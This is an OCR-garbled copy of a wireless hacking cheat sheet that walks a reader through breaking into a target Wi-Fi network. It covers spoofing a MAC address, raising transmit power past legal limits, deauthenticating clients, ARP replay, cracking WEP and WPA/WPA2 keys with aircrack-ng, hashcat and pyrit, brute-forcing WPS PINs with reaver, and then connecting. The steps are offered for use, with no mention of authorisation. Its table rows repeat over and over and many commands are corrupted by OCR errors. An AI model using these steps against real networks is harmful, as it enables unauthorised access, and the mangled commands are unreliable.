## Wireless Network Hacking Cheat Sheet v1.1 | created 2014-05-12 by Michael Allen Follow the numbered boxes in order to crack the encryption of a wireless network.

|                                                                                                    | × 1                                                                                                    |                                                                                                    |
|----------------------------------------------------------------------------------------------------|----------------------------------------------------------------------------------------------------|----------------------------------------------------------------------------------------------------|
| CHEAT SHEET KEY                                                                                                    | 03.a. UNCOVER HIDDEN ESSID                                                                                                    | 04.b. CRACKING WPA/WPA2 (p85/pdf96)                                                                                                    |
| Mandatory instructions<br>Optional instructions (Optional)                                                                                                    | # aireplay-ng -0 5 -a \$bssid -c \$client<br>wlan0                                                                                                    | <pre>don't get it even if airodump says you did. # cowpatty -c -r output-file-prefix- 01 cap</pre>                                                                                                    |
| # Commands<br>\$bssid - Wireless access point MAC                                                                                                    | The ESSID will be shown next to the connected client in airodump-ng once it is captured.                                                                                                    | 3. Crack the key (multiple options).                                                                                                    |
| \$mymac — Wireless interface MAC                                                                                                    | 04. IDENTIFY AND CRACK ENCRYPTION                                                                                                    | a. Cracking with hashcat/oclhashcat. Best option.<br>Multi-core/GPU support can pause/resume_etc                                                                                                    |
| \$chan - Channel of the target network                                                                                                    | <b>Protin</b> : Use the access point's MAC address to find                                                                                                    | Convert the .cap file to a hashcat .hccap file:                                                                                                    |
| \$ESSID - Network's ESSID/Hetwork Halle                                                                                                    | the manufacturer. Then search by manufacturer or                                                                                                    | <pre># aircrack-ng output-file-prefix-01.cap -1 output-file-prefix</pre>                                                                                                    |
| 01. SETUP                                                                                                    | ESSID exploits and default wireless keys for that                                                                                                    |                                                                                                    |
| Stop programs that might interfere with                                                                                                    |                                                                                                    | Crack the password:                                                                                                    |
| <pre>metwork settings (optional): # service network-manager stop</pre>                                                                                                    | 04.a. CRACKING WEP (p74/pdf85)                                                                                                    | 2500 -a 0 -o CRACKED.txt output-file-                                                                                                    |
| <pre># killall -9 dhclient wpa_supplicant</pre>                                                                                                    | For WEP you have to capture enough data (IV's) to calculate the key.                                                                                                    | prefix.hccap wordlist.txt                                                                                                    |
| Take down wireless adapter for settings changes<br># ifconfig wlan0 down                                                                                                    | Open a new terminal window, and begin cracking                                                                                                    | Using pyrit with a wordlist:                                                                                                    |
|                                                                                                    | the data packets you're capturing with airodump-                                                                                                    | <pre># pyrit -r output-file-prefix-01.cap -i wordligt tyt o "#ESSID" o pyrit</pre>                                                                                                    |
| Spoof the MAC address (recommended) # ifconfig wlang by ether                                                                                                    | ng:<br># pircrock ng p 1 l output crocked                                                                                                    | output.txt attack_passthrough                                                                                                    |
| 00:11:22:33:44:55                                                                                                    | key.txt output-file-prefix-01.cap                                                                                                    | Using purit with gonomic tables:                                                                                                    |
| <i>OR:</i><br># macchanger -m 00:11:22:33:44:55 wlan0                                                                                                    |                                                                                                    | <pre># pyrit -r output-file-prefix-01.cap -i</pre>                                                                                                    |
|                                                                                                    | Aircrack-ng can combine the data from multiple                                                                                                    | rainbow.pmk -e "\$ESSID" -o pyrit-<br>output.txt attack cowpatty                                                                                                    |
| rut the card into monitor mode (Optional. May cause problems.)                                                                                                    | .cap files:<br># aircrack-ng -a 1 -1 ouput-cracked                                                                                                    |                                                                                                    |
| Use mon0 for later commands instead of wlan0 if                                                                                                    | key.txt output-prefix-*.cap                                                                                                    | The only way to creak WDA if the person of a pot                                                                                                    |
| you do this.<br># airmon-ng start wlan0                                                                                                    | Let this continue to run while you do the next                                                                                                    | in your list.                                                                                                    |
| # airmon-ng $\leftarrow$ to check that it worked                                                                                                    | steps.                                                                                                    | Close the running airodump-ng.                                                                                                    |
| Increase transmit nower (recommended)                                                                                                    |                                                                                                    | Bruteforce the WPS PIN:<br>reaver -vv -i mon0 -b \$bssid -e \$ESSID                                                                                                    |
| # iw reg set BO                                                                                                    | network to crack the key. You can see how many                                                                                                    | -c \$channelmac=\$mymac                                                                                                    |
| # iwconfig wlan0 txpower 30                                                                                                    | data frames have been captured in airodump-ng's                                                                                                    | Capture the 4-way handshake and begin cracking                                                                                                    |
| Bring the interface back up to apply changes                                                                                                    | #Data column.                                                                                                    | it (04.b). Then attack WPS. If one attack fails or                                                                                                    |
|                                                                                                    | Active: Generate more traffic on the network using                                                                                                    | takes too long, the other may succeed.                                                                                                    |
| 02. BEGIN CAPTURING TRAFFIC                                                                                                    | aireplay-ng to do a ARP replay attack. This will<br>speed things up significantly if data is coming in                                                                                                    | 05. CONNECT TO THE NETWORK                                                                                                    |
|                                                                                                    | speed unings up significantly if data is coming in                                                                                                    |                                                                                                    |
| Start airodump-ng and log captured traffic to a                                                                                                    | slowly. Open another new window and run:                                                                                                    | Disable monitor mode. Enable managed mode.                                                                                                    |
| Start airodump-ng and log captured traffic to a<br>file<br># airodump-ng wlan0 -w output-file-                                                                                                    | slowly. Open another new window and run:<br># aireplay-ng -3 -b \$bssid -h \$client<br>wlanθ                                                                                                    | Disable monitor mode. Enable managed mode.<br># ifconfig wlan0 down<br># airmon-ng stop wlan0                                                                                                    |
| Start airodump-ng and log captured traffic to a<br>file<br># airodump-ng wlan0 -w output-file-<br>prefix                                                                                                    | slowly. Open another new window and run:<br># aireplay-ng -3 -b \$bssid -h \$client<br>wlan0                                                                                                    | Disable monitor mode. Enable managed mode.<br># ifconfig wlan0 down<br># airmon-ng stop wlan0<br># iwconfig wlan0 mode managed<br># ifconfig wlan0 up                                                                                                    |
| Start airodump-ng and log captured traffic to a<br>file<br># airodump-ng wlan0 -w output-file-<br>prefix<br>While capturing traffic with airodump, check that                                                                                                    | slowly. Open another new window and run:<br># aireplay-ng -3 -b \$bssid -h \$client<br>wlan0<br>If it is taking a while to capture any ARP requests,<br>you can try to speed that up too by opening another                                                                                                    | Disable monitor mode. Enable managed mode.<br># ifconfig wlan0 down<br># airmon-ng stop wlan0<br># iwconfig wlan0 mode managed<br># ifconfig wlan0 up                                                                                                    |
| Start airodump-ng and log captured traffic to a<br>file<br># airodump-ng wlan0 -w output-file-<br>prefix<br>While capturing traffic with airodump, check that<br>traffic to see if AP's support WPS. This saves<br>from having to suff traffic trice!                                                                                                    | slowly. Open another new window and run:<br># aireplay-ng -3 -b \$bssid -h \$client<br>wlan0<br>If it is taking a while to capture any ARP requests,<br>you can try to speed that up too by opening another<br>window and deauthenticating the client while                                                                                                    | Disable monitor mode. Enable managed mode.<br># ifconfig wlan0 down<br># airmon-ng stop wlan0<br># iwconfig wlan0 mode managed<br># ifconfig wlan0 up<br>Connect to a specific access point on the<br>network:                                                                                                    |
| Start airodump-ng and log captured traffic to a<br>file<br># airodump-ng wlan0 -w output-file-<br>prefix<br>While capturing traffic with airodump, check that<br>traffic to see if AP's support WPS. This saves<br>from having to sniff traffic twice!<br># wash -C -f output-file-prefix-*.cap                                                                                                    | slowly. Open another new window and run:<br># aireplay-ng -3 -b \$bssid -h \$client<br>wlan0<br>If it is taking a while to capture any ARP requests,<br>you can try to speed that up too by opening another<br>window and deauthenticating the client while<br>aireplay-ng is running. When it reconnects it will<br>send an ARP request:                                                                                                    | Disable monitor mode. Enable managed mode.<br># ifconfig wlan0 down<br># airmon-ng stop wlan0<br># iwconfig wlan0 mode managed<br># ifconfig wlan0 up<br>Connect to a specific access point on the<br>network:<br># iwconfig wlan0 essid \$ESSID ap \$bssid                                                                                                    |
| Start airodump-ng and log captured traffic to a<br>file<br># airodump-ng wlan0 -w output-file-<br>prefix<br>While capturing traffic with airodump, check that<br>traffic to see if AP's support WPS. This saves<br>from having to sniff traffic twice!<br># wash -C -f output-file-prefix-*.cap<br>03. FOCUS ON THE TARGET NETWORK                                                                                                    | slowly. Open another new window and run:<br># aireplay-ng -3 -b \$bssid -h \$client<br>wlan0<br>If it is taking a while to capture any ARP requests,<br>you can try to speed that up too by opening another<br>window and deauthenticating the client while<br>aireplay-ng is running. When it reconnects it will<br>send an ARP request:<br># aireplay -0 5 -a \$bssid -c \$client<br>wlan0                                                                                                    | Disable monitor mode. Enable managed mode.<br># ifconfig wlan0 down<br># airmon-ng stop wlan0<br># iwconfig wlan0 mode managed<br># ifconfig wlan0 up<br>Connect to a specific access point on the<br>network:<br># iwconfig wlan0 essid \$ESSID ap \$bssid<br>OR connect to ANY access point on the<br>network:                                                                                                    |
| Start airodump-ng and log captured traffic to a<br>file<br># airodump-ng wlan0 -w output-file-<br>prefix<br>While capturing traffic with airodump, check that<br>traffic to see if AP's support WPS. This saves<br>from having to sniff traffic twice!<br># wash -C -f output-file-prefix-*.cap<br>03. FOCUS ON THE TARGET NETWORK<br>Stop the currently running airodump-ng<br>(CTRL+C)                                                                                                    | slowly. Open another new window and run:<br># aireplay-ng -3 -b \$bssid -h \$client<br>wlan0<br>If it is taking a while to capture any ARP requests,<br>you can try to speed that up too by opening another<br>window and deauthenticating the client while<br>aireplay-ng is running. When it reconnects it will<br>send an ARP request:<br># aireplay -0 5 -a \$bssid -c \$client<br>wlan0<br>Once the key is cracked, aircrack-ng will display                                                                                                    | Disable monitor mode. Enable managed mode.<br># ifconfig wlan0 down<br># airmon-ng stop wlan0<br># iwconfig wlan0 mode managed<br># ifconfig wlan0 up<br>Connect to a specific access point on the<br>network:<br># iwconfig wlan0 essid \$ESSID ap \$bssid<br>OR connect to ANY access point on the<br>network:<br># iwconfig wlan0 essid \$ESSID ap any                                                                                                    |
| Start airodump-ng and log captured traffic to a<br>file<br># airodump-ng wlan0 -w output-file-<br>prefix<br>While capturing traffic with airodump, check that<br>traffic to see if AP's support WPS. This saves<br>from having to sniff traffic twice!<br># wash -C -f output-file-prefix-*.cap<br>03. FOCUS ON THE TARGET NETWORK<br>Stop the currently running airodump-ng<br>(CTRL+C)                                                                                                    | slowly. Open another new window and run:<br># aireplay-ng -3 -b \$bssid -h \$client<br>wlanθ<br>If it is taking a while to capture any ARP requests,<br>you can try to speed that up too by opening another<br>window and deauthenticating the client while<br>aireplay-ng is running. When it reconnects it will<br>send an ARP request:<br># aireplay -0 5 -a \$bssid -c \$client<br>wlan0<br>Once the key is cracked, aircrack-ng will display<br>it on screen and save it to output-cracked-                                                                                                    | Disable monitor mode. Enable managed mode.<br># ifconfig wlan0 down<br># airmon-ng stop wlan0<br># iwconfig wlan0 mode managed<br># ifconfig wlan0 up<br>Connect to a specific access point on the<br>network:<br># iwconfig wlan0 essid \$ESSID ap \$bssid<br>OR connect to ANY access point on the<br>network:<br># iwconfig wlan0 essid \$ESSID ap any<br>Connect using WEP:                                                                                                    |
| Start airodump-ng and log captured traffic to a<br>file<br># airodump-ng wlan0 -w output-file-<br>prefix<br>While capturing traffic with airodump, check that<br>traffic to see if AP's support WPS. This saves<br>from having to sniff traffic twice!<br># wash -C -f output-file-prefix-*.cap<br>03. FOCUS ON THE TARGET NETWORK<br>Stop the currently running airodump-ng<br>(CTRL+C)<br>Run airodump-ng focused only on the target<br>network                                                                                                    | slowly. Open another new window and run:<br># aireplay-ng -3 -b \$bssid -h \$client<br>wlan0<br>If it is taking a while to capture any ARP requests,<br>you can try to speed that up too by opening another<br>window and deauthenticating the client while<br>aireplay-ng is running. When it reconnects it will<br>send an ARP request:<br># aireplay -0 5 -a \$bssid -c \$client<br>wlan0<br>Once the key is cracked, aircrack-ng will display<br>it on screen and save it to output-cracked-<br>key.txt                                                                                                    | <pre>Disable monitor mode. Enable managed mode. # ifconfig wlan0 down # airmon-ng stop wlan0 # iwconfig wlan0 mode managed # ifconfig wlan0 up Connect to a specific access point on the network: # iwconfig wlan0 essid \$ESSID ap \$bssid OR connect to ANY access point on the network: # iwconfig wlan0 essid \$ESSID ap any Connect using WEP: # iwconfig wlan0 essid \$ESSID key \$PASSWORD &amp;&amp; dpclient wlan0</pre>                                                                                                    |
| Start airodump-ng and log captured traffic to a<br>file<br># airodump-ng wlan0 -w output-file-<br>prefix<br>While capturing traffic with airodump, check that<br>traffic to see if AP's support WPS. This saves<br>from having to sniff traffic twice!<br># wash -C -f output-file-prefix-*.cap<br>03. FOCUS ON THE TARGET NETWORK<br>Stop the currently running airodump-ng<br>(CTRL+C)<br>Run airodump-ng focused only on the target<br>network<br># airodump-ng wlan0 -w output-file-                                                                                                    | slowly. Open another new window and run:<br># aireplay-ng -3 -b \$bssid -h \$client<br>wlan0<br>If it is taking a while to capture any ARP requests,<br>you can try to speed that up too by opening another<br>window and deauthenticating the client while<br>aireplay-ng is running. When it reconnects it will<br>send an ARP request:<br># aireplay -0 5 -a \$bssid -c \$client<br>wlan0<br>Once the key is cracked, aircrack-ng will display<br>it on screen and save it to output-cracked-<br>key.txt<br>04.b. CRACKING WPA/WPA2 (p85/pdf96)                                                                                                    | Disable monitor mode. Enable managed mode.<br># ifconfig wlan0 down<br># airmon-ng stop wlan0<br># iwconfig wlan0 mode managed<br># ifconfig wlan0 up<br>Connect to a specific access point on the<br>network:<br># iwconfig wlan0 essid \$ESSID ap \$bssid<br>OR connect to ANY access point on the<br>network:<br># iwconfig wlan0 essid \$ESSID ap any<br>Connect using WEP:<br># iwconfig wlan0 essid \$ESSID key<br>\$PASSWORD && dhclient wlan0                                                                                                    |
| Start airodump-ng and log captured traffic to a<br>file<br># airodump-ng wlan0 -w output-file-<br>prefix<br>While capturing traffic with airodump, check that<br>traffic to see if AP's support WPS. This saves<br>from having to sniff traffic twice!<br># wash -C -f output-file-prefix-*.cap<br>03. FOCUS ON THE TARGET NETWORK<br>Stop the currently running airodump-ng<br>(CTRL+C)<br>Run airodump-ng focused only on the target<br>network<br># airodump-ng wlan0 -w output-file-<br>prefixchannel \$chanbssid \$bssid                                                                                                    | slowly. Open another new window and run:<br># aireplay-ng -3 -b \$bssid -h \$client<br>wlan0<br>If it is taking a while to capture any ARP requests,<br>you can try to speed that up too by opening another<br>window and deauthenticating the client while<br>aireplay-ng is running. When it reconnects it will<br>send an ARP request:<br># aireplay -0 5 -a \$bssid -c \$client<br>wlan0<br>Once the key is cracked, aircrack-ng will display<br>it on screen and save it to output-cracked-<br>key.txt<br>04.b. CRACKING WPA/WPA2 (p85/pdf96)<br>1. Capture the 4-way handshake. This happens                                                                                                    | <pre>Disable monitor mode. Enable managed mode. # ifconfig wlan0 down # airmon-ng stop wlan0 # iwconfig wlan0 mode managed # ifconfig wlan0 up Connect to a specific access point on the network: # iwconfig wlan0 essid \$ESSID ap \$bssid OR connect to ANY access point on the network: # iwconfig wlan0 essid \$ESSID ap any Connect using WEP: # iwconfig wlan0 essid \$ESSID key \$PASSWORD &amp;&amp; dhclient wlan0 Connect using WPA/WPA2: Stop interfering programs (see setup)</pre>                                                                                                    |
| Start airodump-ng and log captured traffic to a<br>file<br># airodump-ng wlan0 -w output-file-<br>prefix<br>While capturing traffic with airodump, check that<br>traffic to see if AP's support WPS. This saves<br>from having to sniff traffic twice!<br># wash -C -f output-file-prefix-*.cap<br>03. FOCUS ON THE TARGET NETWORK<br>Stop the currently running airodump-ng<br>(CTRL+C)<br>Run airodump-ng focused only on the target<br>network<br># airodump-ng wlan0 -w output-file-<br>prefixchannel \$chanbssid \$bssid<br>A number is appended to the end of output-file-                                                                                                    | slowly. Open another new window and run:<br># aireplay-ng -3 -b \$bssid -h \$client<br>wlan0<br>If it is taking a while to capture any ARP requests,<br>you can try to speed that up too by opening another<br>window and deauthenticating the client while<br>aireplay-ng is running. When it reconnects it will<br>send an ARP request:<br># aireplay -0 5 -a \$bssid -c \$client<br>wlan0<br>Once the key is cracked, aircrack-ng will display<br>it on screen and save it to output-cracked-<br>key.txt<br>04.b. CRACKING WPA/WPA2 (p85/pdf96)<br>1. Capture the 4-way handshake. This happens<br>when a client device connects to the network. The<br>already running airodumn-ng will do this part On                                                                                                    | Disable monitor mode. Enable managed mode.<br># ifconfig wlan0 down<br># airmon-ng stop wlan0<br># iwconfig wlan0 mode managed<br># ifconfig wlan0 up<br>Connect to a specific access point on the<br>network:<br># iwconfig wlan0 essid \$ESSID ap \$bssid<br>OR connect to ANY access point on the<br>network:<br># iwconfig wlan0 essid \$ESSID ap any<br>Connect using WEP:<br># iwconfig wlan0 essid \$ESSID key<br>\$PASSWORD && dhclient wlan0<br>Connect using WPA/WPA2:<br>Stop interfering programs (see setup).<br>Create wpa_supplicant.conf:                                                                                                    |
| Start airodump-ng and log captured traffic to a<br>file<br># airodump-ng wlan0 -w output-file-<br>prefix<br>While capturing traffic with airodump, check that<br>traffic to see if AP's support WPS. This saves<br>from having to sniff traffic twice!<br># wash -C -f output-file-prefix-*.cap<br>03. FOCUS ON THE TARGET NETWORK<br>Stop the currently running airodump-ng<br>(CTRL+C)<br>Run airodump-ng focused only on the target<br>network<br># airodump-ng wlan0 -w output-file-<br>prefixchannel \$chanbssid \$bssid<br>A number is appended to the end of output-file-<br>prefix every time, so it is OK to use the same prefix<br>wulfiel time.                                                                                                    | slowly. Open another new window and run:<br># aireplay-ng -3 -b \$bssid -h \$client<br>wlan0<br>If it is taking a while to capture any ARP requests,<br>you can try to speed that up too by opening another<br>window and deauthenticating the client while<br>aireplay-ng is running. When it reconnects it will<br>send an ARP request:<br># aireplay -0 5 -a \$bssid -c \$client<br>wlan0<br>Once the key is cracked, aircrack-ng will display<br>it on screen and save it to output-cracked-<br>key.txt<br>04.b. CRACKING WPA/WPA2 (p85/pdf96)<br>1. Capture the 4-way handshake. This happens<br>when a client device connects to the network. The<br>already running airodump-ng will do this part. On<br>success, airodump-ng displays:                                                                                                    | <pre>Disable monitor mode. Enable managed mode. # ifconfig wlan0 down # airmon-ng stop wlan0 # iwconfig wlan0 mode managed # ifconfig wlan0 up Connect to a specific access point on the network: # iwconfig wlan0 essid \$ESSID ap \$bssid OR connect to ANY access point on the network: # iwconfig wlan0 essid \$ESSID ap any Connect using WEP: # iwconfig wlan0 essid \$ESSID key \$PASSWORD &amp;&amp; dhclient wlan0 Connect using WPA/WPA2: Stop interfering programs (see setup). Create wpa_supplicant.conf: # wpa_passphrase \$ESSID \$PASSWORD &gt; wpa_supplicant_conf</pre>                                                                                                    |
| Start airodump-ng and log captured traffic to a<br>file<br># airodump-ng wlan0 -w output-file-<br>prefix<br>While capturing traffic with airodump, check that<br>traffic to see if AP's support WPS. This saves<br>from having to sniff traffic twice!<br># wash -C -f output-file-prefix-*.cap<br>03. FOCUS ON THE TARGET NETWORK<br>Stop the currently running airodump-ng<br>(CTRL+C)<br>Run airodump-ng focused only on the target<br>network<br># airodump-ng wlan0 -w output-file-<br>prefixchannel \$chanbssid \$bssid<br>A number is appended to the end of output-file-<br>prefix every time, so it is OK to use the same prefix<br>multiple times - it will not overwrite your saved<br>data.                                                                                                    | slowly. Open another new window and run:<br># aireplay-ng -3 -b \$bssid -h \$client<br>wlan0<br>If it is taking a while to capture any ARP requests,<br>you can try to speed that up too by opening another<br>window and deauthenticating the client while<br>aireplay-ng is running. When it reconnects it will<br>send an ARP request:<br># aireplay -0 5 -a \$bssid -c \$client<br>wlan0<br>Once the key is cracked, aircrack-ng will display<br>it on screen and save it to output-cracked-<br>key.txt<br>04.b. CRACKING WPA/WPA2 (p85/pdf96)<br>1. Capture the 4-way handshake. This happens<br>when a client device connects to the network. The<br>already running airodump-ng will do this part. On<br>success, airodump-ng displays:<br>[ WPA Handshake: 00:00:00:00:00:00:00<br>in the top right                                                                                                    | <pre>Disable monitor mode. Enable managed mode. # ifconfig wlan0 down # airmon-ng stop wlan0 # iwconfig wlan0 mode managed # ifconfig wlan0 up Connect to a specific access point on the network: # iwconfig wlan0 essid \$ESSID ap \$bssid OR connect to ANY access point on the network: # iwconfig wlan0 essid \$ESSID ap any Connect using WEP: # iwconfig wlan0 essid \$ESSID key \$PASSWORD &amp;&amp; dhclient wlan0 Connect using WPA/WPA2: Stop interfering programs (see setup). Create wpa_supplicant.conf: # wpa_passphrase \$ESSID \$PASSWORD &gt; wpa_supplicant.conf</pre>                                                                                                    |
| Start airodump-ng and log captured traffic to a<br>file<br># airodump-ng wlan0 -w output-file-<br>prefix<br>While capturing traffic with airodump, check that<br>traffic to see if AP's support WPS. This saves<br>from having to sniff traffic twice!<br># wash -C -f output-file-prefix-*.cap<br>03. FOCUS ON THE TARGET NETWORK<br>Stop the currently running airodump-ng<br>(CTRL+C)<br>Run airodump-ng focused only on the target<br>network<br># airodump-ng wlan0 -w output-file-<br>prefixchannel \$chanbssid \$bssid<br>A number is appended to the end of output-file-<br>prefix every time, so it is OK to use the same prefix<br>multiple times – it will not overwrite your saved<br>data.                                                                                                    | slowly. Open another new window and run:<br># aireplay-ng -3 -b \$bssid -h \$client<br>wlan0<br>If it is taking a while to capture any ARP requests,<br>you can try to speed that up too by opening another<br>window and deauthenticating the client while<br>aireplay-ng is running. When it reconnects it will<br>send an ARP request:<br># aireplay -0 5 -a \$bssid -c \$client<br>wlan0<br>Once the key is cracked, aircrack-ng will display<br>it on screen and save it to output-cracked-<br>key.txt<br>04.b. CRACKING WPA/WPA2 (p85/pdf96)<br>1. Capture the 4-way handshake. This happens<br>when a client device connects to the network. The<br>already running airodump-ng will do this part. On<br>success, airodump-ng displays:<br>[ WPA Handshake: 00:00:00:00:00:00<br>in the top right.                                                                                                    | <pre>Disable monitor mode. Enable managed mode. # ifconfig wlan0 down # airmon-ng stop wlan0 # iwconfig wlan0 mode managed # ifconfig wlan0 up Connect to a specific access point on the network: # iwconfig wlan0 essid \$ESSID ap \$bssid OR connect to ANY access point on the network: # iwconfig wlan0 essid \$ESSID ap any Connect using WEP: # iwconfig wlan0 essid \$ESSID key \$PASSWORD &amp;&amp; dhclient wlan0 Connect using WPA/WPA2: Stop interfering programs (see setup). Create wpa_supplicant.conf: # wpa_passphrase \$ESSID \$PASSWORD &gt; wpa_supplicant.conf Connect to the network. # wpa supplicant - cwpa supplicant.conf</pre>                                                                                                    |
| Start airodump-ng and log captured traffic to a<br>file<br># airodump-ng wlan0 -w output-file-<br>prefix<br>While capturing traffic with airodump, check that<br>traffic to see if AP's support WPS. This saves<br>from having to sniff traffic twice!<br># wash -C -f output-file-prefix-*.cap<br>03. FOCUS ON THE TARGET NETWORK<br>Stop the currently running airodump-ng<br>(CTRL+C)<br>Run airodump-ng focused only on the target<br>network<br># airodump-ng wlan0 -w output-file-<br>prefixchannel \$chanbssid \$bssid<br>A number is appended to the end of output-file-<br>prefix every time, so it is OK to use the same prefix<br>multiple times - it will not overwrite your saved<br>data.<br>03.a. UNCOVER HIDDEN ESSID<br>You must capture a Probe frame sent by a client                                                                                                    | slowly. Open another new window and run:<br># aireplay-ng -3 -b \$bssid -h \$client<br>wlan0<br>If it is taking a while to capture any ARP requests,<br>you can try to speed that up too by opening another<br>window and deauthenticating the client while<br>aireplay-ng is running. When it reconnects it will<br>send an ARP request:<br># aireplay -0 5 -a \$bssid -c \$client<br>wlan0<br>Once the key is cracked, aircrack-ng will display<br>it on screen and save it to output-cracked-<br>key.txt<br>04.b. CRACKING WPA/WPA2 (p85/pdf96)<br>1. Capture the 4-way handshake. This happens<br>when a client device connects to the network. The<br>already running airodump-ng will do this part. On<br>success, airodump-ng displays:<br>[ WPA Handshake: 00:00:00:00:00:00<br>in the top right.<br>Passive: Wait for a device to connect to the<br>network.                                                                                                    | Disable monitor mode. Enable managed mode.<br># ifconfig wlan0 down<br># airmon-ng stop wlan0<br># iwconfig wlan0 mode managed<br># ifconfig wlan0 up<br>Connect to a specific access point on the<br>network:<br># iwconfig wlan0 essid \$ESSID ap \$bssid<br>OR connect to ANY access point on the<br>network:<br># iwconfig wlan0 essid \$ESSID ap any<br>Connect using WEP:<br># iwconfig wlan0 essid \$ESSID key<br>\$PASSWORD && dhclient wlan0<br>Connect using WPA/WPA2:<br>Stop interfering programs (see setup).<br>Create wpa_supplicant.conf:<br># wpa_passphrase \$ESSID \$PASSWORD ><br>wpa_supplicant.conf<br>Connect to the network.<br># wpa_supplicant -cwpa_supplicant.conf<br>-iwlan0 -B && dhclient wlan0                                                                                                    |
| Start airodump-ng and log captured traffic to a file         # airodump-ng wlan0 -w output-file-prefix         While capturing traffic with airodump, check that traffic to see if AP's support WPS. This saves from having to sniff traffic twice!         # wash -C -f output-file-prefix-*.cap         03. FOCUS ON THE TARGET NETWORK         Stop the currently running airodump-ng (CTRL+C)         Run airodump-ng focused only on the target network         # airodump-ng wlan0 -w output-file-prefixchannel \$chanbssid \$bssid         A number is appended to the end of output-file-prefix every time, so it is OK to use the same prefix multiple times – it will not overwrite your saved data.         03.a. UNCOVER HIDDEN ESSID         You must capture a Probe frame sent by a client machine as it connects to the network.                                                                                                    | slowly. Open another new window and run:<br># aireplay-ng -3 -b \$bssid -h \$client<br>wlan0<br>If it is taking a while to capture any ARP requests,<br>you can try to speed that up too by opening another<br>window and deauthenticating the client while<br>aireplay-ng is running. When it reconnects it will<br>send an ARP request:<br># aireplay -0 5 -a \$bssid -c \$client<br>wlan0<br>Once the key is cracked, aircrack-ng will display<br>it on screen and save it to output-cracked-<br>key.txt<br>04.b. CRACKING WPA/WPA2 (p85/pdf96)<br>1. Capture the 4-way handshake. This happens<br>when a client device connects to the network. The<br>already running airodump-ng will do this part. On<br>success, airodump-ng displays:<br>[ WPA Handshake: 00:00:00:00:00:00<br>in the top right.<br>Passive: Wait for a device to connect to the<br>network.                                                                                                    | <pre>Disable monitor mode. Enable managed mode. # ifconfig wlan0 down # airmon-ng stop wlan0 # iwconfig wlan0 mode managed # ifconfig wlan0 up Connect to a specific access point on the network: # iwconfig wlan0 essid \$ESSID ap \$bssid OR connect to ANY access point on the network: # iwconfig wlan0 essid \$ESSID ap any Connect using WEP: # iwconfig wlan0 essid \$ESSID key \$PASSWORD &amp;&amp; dhclient wlan0 Connect using WPA/WPA2: Stop interfering programs (see setup). Create wpa_supplicant.conf: # wpa_passphrase \$ESSID \$PASSWORD &gt; wpa_supplicant.conf Connect to the network. # wpa_supplicant -cwpa_supplicant.conf -iwlan0 -B &amp;&amp; dhclient wlan0</pre>                                                                                                    |
| Start airodump-ng and log captured traffic to a file         # airodump-ng wlan0 -w output-file-prefix         While capturing traffic with airodump, check that traffic to see if AP's support WPS. This saves from having to sniff traffic twice!         # wash -C -f output-file-prefix-*.cap         03. FOCUS ON THE TARGET NETWORK         Stop the currently running airodump-ng (CTRL+C)         Run airodump-ng focused only on the target network         # airodump-ng wlan0 -w output-file-prefixchannel \$chanbssid \$bssid         A number is appended to the end of output-file-prefix every time, so it is OK to use the same prefix multiple times – it will not overwrite your saved data.         03.a. UNCOVER HIDDEN ESSID         You must capture a Probe frame sent by a client machine as it connects to the network.                                                                                                    | slowly. Open another new window and run:<br># aireplay-ng -3 -b \$bssid -h \$client<br>wlan0<br>If it is taking a while to capture any ARP requests,<br>you can try to speed that up too by opening another<br>window and deauthenticating the client while<br>aireplay-ng is running. When it reconnects it will<br>send an ARP request:<br># aireplay -0 5 -a \$bssid -c \$client<br>wlan0<br>Once the key is cracked, aircrack-ng will display<br>it on screen and save it to output-cracked-<br>key.txt<br>04.b. CRACKING WPA/WPA2 (p85/pdf96)<br>1. Capture the 4-way handshake. This happens<br>when a client device connects to the network. The<br>already running airodump-ng will do this part. On<br>success, airodump-ng displays:<br>[ WPA Handshake: 00:00:00:00:00:00<br>in the top right.<br>Passive: Wait for a device to connect to the<br>network.<br>Active: Deauthenticate a device currently<br>connected to the network and capture the                                                                                                    | Disable monitor mode. Enable managed mode.<br># ifconfig wlan0 down<br># airmon-ng stop wlan0<br># iwconfig wlan0 mode managed<br># ifconfig wlan0 up<br>Connect to a specific access point on the<br>network:<br># iwconfig wlan0 essid \$ESSID ap \$bssid<br>OR connect to ANY access point on the<br>network:<br># iwconfig wlan0 essid \$ESSID ap any<br>Connect using WEP:<br># iwconfig wlan0 essid \$ESSID key<br>\$PASSWORD && dhclient wlan0<br>Connect using WPA/WPA2:<br>Stop interfering programs (see setup).<br>Create wpa_supplicant.conf:<br># wpa_passphrase \$ESSID \$PASSWORD ><br>wpa_supplicant.conf<br>Connect to the network.<br># wpa_supplicant - cwpa_supplicant.conf<br>-iwlan0 -B && dhclient wlan0<br>Recommended resources:<br>BackTrack 5 Wireless Penetration Testing                                                                                                    |
| Start airodump-ng and log captured traffic to a<br>file<br># airodump-ng wlan0 -w output-file-<br>prefix<br>While capturing traffic with airodump, check that<br>traffic to see if AP's support WPS. This saves<br>from having to sniff traffic twice!<br># wash -C -f output-file-prefix-*.cap<br>03. FOCUS ON THE TARGET NETWORK<br>Stop the currently running airodump-ng<br>(CTRL+C)<br>Run airodump-ng focused only on the target<br>network<br># airodump-ng wlan0 -w output-file-<br>prefixchannel \$chanbssid \$bssid<br>A number is appended to the end of output-file-<br>prefix every time, so it is OK to use the same prefix<br>multiple times - it will not overwrite your saved<br>data.<br>03.a. UNCOVER HIDDEN ESSID<br>You must capture a Probe frame sent by a client<br>machine as it connects to the network.<br>Passive: Wait. Eventually it will happen on its own<br>and the ESSID will appear in either the top (access                                                                                                    | slowly. Open another new window and run:<br># aireplay-ng -3 -b \$bssid -h \$client<br>wlan0<br>If it is taking a while to capture any ARP requests,<br>you can try to speed that up too by opening another<br>window and deauthenticating the client while<br>aireplay-ng is running. When it reconnects it will<br>send an ARP request:<br># aireplay -0 5 -a \$bssid -c \$client<br>wlan0<br>Once the key is cracked, aircrack-ng will display<br>it on screen and save it to output-cracked-<br>key.txt<br>04.b. CRACKING WPA/WPA2 (p85/pdf96)<br>1. Capture the 4-way handshake. This happens<br>when a client device connects to the network. The<br>already running airodump-ng will do this part. On<br>success, airodump-ng displays:<br>[ WPA Handshake: 00:00:00:00:00:00<br>in the top right.<br>Passive: Wait for a device to connect to the<br>network.<br>Active: Deauthenticate a device currently<br>connected to the network and capture the<br>handshake as it reconnects. In a new terminal                                                                                                    | <pre>Disable monitor mode. Enable managed mode. # ifconfig wlan0 down # airmon-ng stop wlan0 # iwconfig wlan0 mode managed # ifconfig wlan0 up Connect to a specific access point on the network: # iwconfig wlan0 essid \$ESSID ap \$bssid OR connect to ANY access point on the network: # 